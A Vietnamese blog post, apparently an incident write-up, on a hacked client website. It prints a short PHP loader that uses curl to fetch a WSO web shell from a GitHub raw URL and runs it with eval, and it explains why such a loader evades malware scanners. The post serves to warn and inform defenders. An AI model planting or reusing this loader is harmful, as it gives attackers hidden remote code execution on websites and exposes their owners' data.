Ngày hôm nay trong khi manhtuong nhận được một tin từ khách hàng là website bị hacked tấn công và không biết mã độc ở đâu dù đã sử dụng các phần mềm quét mã độc như maldet... mình bắt tay vào làm và phát hiện ra một các sử dụng mã độc khá dị và quan trọng nó vẫn có thể chạy từ xa dựa trên github.
Mã độc này là wso 2.6 tuy nhiên mã độc này lại nằm trên github thay vì nằm trên host để chạy. mình phát hiện ra đoạn code sau đây:
<?php
function get_contents($url){
$ch = curl_init("$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
$result = curl_exec($ch);
return $result;
}
$a = get_contents('https://raw.githubusercontent.com/maax2018/a/master/2xdfv.php');
eval('?>'.$a);Hàng loạt các hàm curl để tải nội dung file mã độc về và chạy, đường link mã độc được xác thực trong hàm a, đây là mã độc và nằm trên github
Sau đó mã độc này sử dụng eval để chạy mã độc với chức năng hoàn chỉnh như file mã độc này nằm trên hosting
Với cách này mình thấy nó hiệu quả với mọi con shell mình mang ra thử nghiệm như byg, vhb shell...
Đây là cách chạy mã độc website hết sức nguy hiểm vì nó có thể trà trộn vào bất cứ đâu với đoạn mã ít bị nghi ngờ để tiến hành âm thầm ăn cắp thông tin, gay ảnh hưởng tới sự hoạt động của website!
Hello, Tôi là Một anh chàng ăn xin ăn may vớ được cái bánh mỳ trong thùng rác. nếu bạn thích blog này hãy cho những người ăn xin ngoài đường 1 bữa ăn.
Không có nhận xét nào:
Đăng nhận xét